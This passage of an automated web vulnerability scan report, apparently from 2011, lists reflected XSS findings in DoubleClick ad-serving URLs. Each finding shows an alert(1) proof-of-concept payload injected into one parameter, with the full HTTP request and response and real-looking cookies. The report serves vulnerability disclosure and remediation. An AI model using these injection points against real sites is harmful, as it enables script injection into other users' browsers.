Content-Type: text/html
Content-Length: 4614
Date: Tue, 28 Jun 2011 03:09:56 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
5050_KatieMike_300x250.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488db96c'-alert(1)-'befe711ab0a&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D7004%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26
...[SNIP]...

1.39. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/alldayslim/ron

Issue detail

The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3423'-alert(1)-'c547628938b was submitted in the _o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/alldayslim/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944a3423'-alert(1)-'c547628938b&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=;u=17331365;ord=9530323? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0A8HKKdbgw5ZImcnjgegpaU-J6ajYxgGYFDE69-CHYCzaa4qhal2U5KuTm7yJNu0RxYxDU_Y3-fbZ8H0Hy6be1QmjqakoxiNXIOa8MhrMb62SDgAekk4At9Xwgl4P_ADwRkDtXMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.alldayslim.com&_wp=AAABMNQ33gS2zlTVJGnWaGtLEK3X84GBah6Scw&_nv=1&_CDbg=17328950&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAADZrCAEAAAAAvG8IAQAAAAAFxQcBAAAAAKV0CAEAAAAAp3AIAQAAAACocAgBAAAAACND7EEfhetRuB7tPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5NzE2NzQ1My02Yzk3LTRjN2ItYjk0Zi05YTdjZTE0NDk3ZWIkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAJhFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4614
Date: Tue, 28 Jun 2011 03:09:08 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
s0.2mdn.net/3126678/SLIM_5050_KatieMike_300x250.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944a3423'-alert(1)-'c547628938b&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D7004%26avppid%3D653%26avpcid
...[SNIP]...

1.40. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_pm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/alldayslim/ron

Issue detail

The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb5b1'-alert(1)-'8ffdd34280f was submitted in the _pm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/alldayslim/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956cb5b1'-alert(1)-'8ffdd34280f&_pn=17331365&redirect=;u=17331365;ord=9530323? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0A8HKKdbgw5ZImcnjgegpaU-J6ajYxgGYFDE69-CHYCzaa4qhal2U5KuTm7yJNu0RxYxDU_Y3-fbZ8H0Hy6be1QmjqakoxiNXIOa8MhrMb62SDgAekk4At9Xwgl4P_ADwRkDtXMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.alldayslim.com&_wp=AAABMNQ33gS2zlTVJGnWaGtLEK3X84GBah6Scw&_nv=1&_CDbg=17328950&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAADZrCAEAAAAAvG8IAQAAAAAFxQcBAAAAAKV0CAEAAAAAp3AIAQAAAACocAgBAAAAACND7EEfhetRuB7tPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5NzE2NzQ1My02Yzk3LTRjN2ItYjk0Zi05YTdjZTE0NDk3ZWIkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAJhFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4608
Date: Tue, 28 Jun 2011 03:11:51 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956cb5b1'-alert(1)-'8ffdd34280f&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D6954%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26sid%3D744';
var target = '_blank';
var dcbgcolor = '';

...[SNIP]...

1.41. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_pn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/alldayslim/ron

Issue detail

The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42fa3'-alert(1)-'a131aad650a was submitted in the _pn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/alldayslim/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=1733136542fa3'-alert(1)-'a131aad650a&redirect=;u=17331365;ord=9530323? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0A8HKKdbgw5ZImcnjgegpaU-J6ajYxgGYFDE69-CHYCzaa4qhal2U5KuTm7yJNu0RxYxDU_Y3-fbZ8H0Hy6be1QmjqakoxiNXIOa8MhrMb62SDgAekk4At9Xwgl4P_ADwRkDtXMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.alldayslim.com&_wp=AAABMNQ33gS2zlTVJGnWaGtLEK3X84GBah6Scw&_nv=1&_CDbg=17328950&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAADZrCAEAAAAAvG8IAQAAAAAFxQcBAAAAAKV0CAEAAAAAp3AIAQAAAACocAgBAAAAACND7EEfhetRuB7tPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5NzE2NzQ1My02Yzk3LTRjN2ItYjk0Zi05YTdjZTE0NDk3ZWIkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAJhFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4602
Date: Tue, 28 Jun 2011 03:12:15 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
e = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=1733136542fa3'-alert(1)-'a131aad650a&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D6972%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26sid%3D744';
var target = '_blank';
var dcbgcolor = '';
var dcswf = '
...[SNIP]...

1.42. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/alldayslim/ron

Issue detail

The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f823e'-alert(1)-'1fb1ebda1f6 was submitted in the _s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/alldayslim/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683f823e'-alert(1)-'1fb1ebda1f6&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=;u=17331365;ord=9530323? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0A8HKKdbgw5ZImcnjgegpaU-J6ajYxgGYFDE69-CHYCzaa4qhal2U5KuTm7yJNu0RxYxDU_Y3-fbZ8H0Hy6be1QmjqakoxiNXIOa8MhrMb62SDgAekk4At9Xwgl4P_ADwRkDtXMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.alldayslim.com&_wp=AAABMNQ33gS2zlTVJGnWaGtLEK3X84GBah6Scw&_nv=1&_CDbg=17328950&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAADZrCAEAAAAAvG8IAQAAAAAFxQcBAAAAAKV0CAEAAAAAp3AIAQAAAACocAgBAAAAACND7EEfhetRuB7tPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5NzE2NzQ1My02Yzk3LTRjN2ItYjk0Zi05YTdjZTE0NDk3ZWIkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAJhFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4614
Date: Tue, 28 Jun 2011 03:10:43 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
0.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683f823e'-alert(1)-'1fb1ebda1f6&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D6971%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26sid%3D744';
var targe
...[SNIP]...

1.43. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/alldayslim/ron

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 298a7'-alert(1)-'14caee42673 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/alldayslim/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=298a7'-alert(1)-'14caee42673 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0A8HKKdbgw5ZImcnjgegpaU-J6ajYxgGYFDE69-CHYCzaa4qhal2U5KuTm7yJNu0RxYxDU_Y3-fbZ8H0Hy6be1QmjqakoxiNXIOa8MhrMb62SDgAekk4At9Xwgl4P_ADwRkDtXMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.alldayslim.com&_wp=AAABMNQ33gS2zlTVJGnWaGtLEK3X84GBah6Scw&_nv=1&_CDbg=17328950&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAADZrCAEAAAAAvG8IAQAAAAAFxQcBAAAAAKV0CAEAAAAAp3AIAQAAAACocAgBAAAAACND7EEfhetRuB7tPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5NzE2NzQ1My02Yzk3LTRjN2ItYjk0Zi05YTdjZTE0NDk3ZWIkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAJhFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4467
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 03:12:32 GMT
Expires: Tue, 28 Jun 2011 03:12:32 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
e';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=298a7'-alert(1)-'14caee42673http://rts.alldayslim.com/p/fa760703?avpzid=1018&avpmid=6990&avppid=653&avpcid=3736&avpaid=337&sid=744';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/3126678/SLIM_Quiz_Spo
...[SNIP]...

1.44. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/alldayslim/ron

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67ac6'-alert(1)-'f3abb855eac was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/alldayslim/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb67ac6'-alert(1)-'f3abb855eac&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=;u=17331365;ord=9530323? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0A8HKKdbgw5ZImcnjgegpaU-J6ajYxgGYFDE69-CHYCzaa4qhal2U5KuTm7yJNu0RxYxDU_Y3-fbZ8H0Hy6be1QmjqakoxiNXIOa8MhrMb62SDgAekk4At9Xwgl4P_ADwRkDtXMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.alldayslim.com&_wp=AAABMNQ33gS2zlTVJGnWaGtLEK3X84GBah6Scw&_nv=1&_CDbg=17328950&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAADZrCAEAAAAAvG8IAQAAAAAFxQcBAAAAAKV0CAEAAAAAp3AIAQAAAACocAgBAAAAACND7EEfhetRuB7tPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5NzE2NzQ1My02Yzk3LTRjN2ItYjk0Zi05YTdjZTE0NDk3ZWIkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAJhFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4602
Date: Tue, 28 Jun 2011 03:08:49 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
dcgif = 'http://s0.2mdn.net/3126678/SLIM_Wipe_Katie_300x250.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb67ac6'-alert(1)-'f3abb855eac&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D7014%26avppid%3D
...[SNIP]...

1.45. http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1 [_c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/allstate/poem1

Issue detail

The value of the _c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1eaf6"-alert(1)-"1c881d63b74 was submitted in the _c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=170805091eaf6"-alert(1)-"1c881d63b74&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=2507911? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvRHCMAwG0I_fM5c16DjdxZZlKUvQUtux3KVjJEZiIMjr34QDgLvzmqJbI7EUKQ9NVFsVGrrOyViGqgccn7fynXDaR8u1NS9M7KakXRbqsThZ5h6TLDzbf5wBfQRcgM8WcAXeL_wAVkOPlnMAAAA%3D%26dst%3Dhttp%253A%252F%252Fallstate.com&_wp=AAABMNP-ME81bEEMb-QRfDpqx4jvs7eBEPKBtw&_nv=1&_CDbg=17087056&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFC6BAEAAAAAwZ4KAQAAAAC9oAQBAAAAAOCjCgEAAAAAxKIKAQAAAAAGuAQBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABlM2MyMWU4Yi01ODIxLTRmNzItYWJhNS1mN2MwMjgzNWY3N2UkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANQ2CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
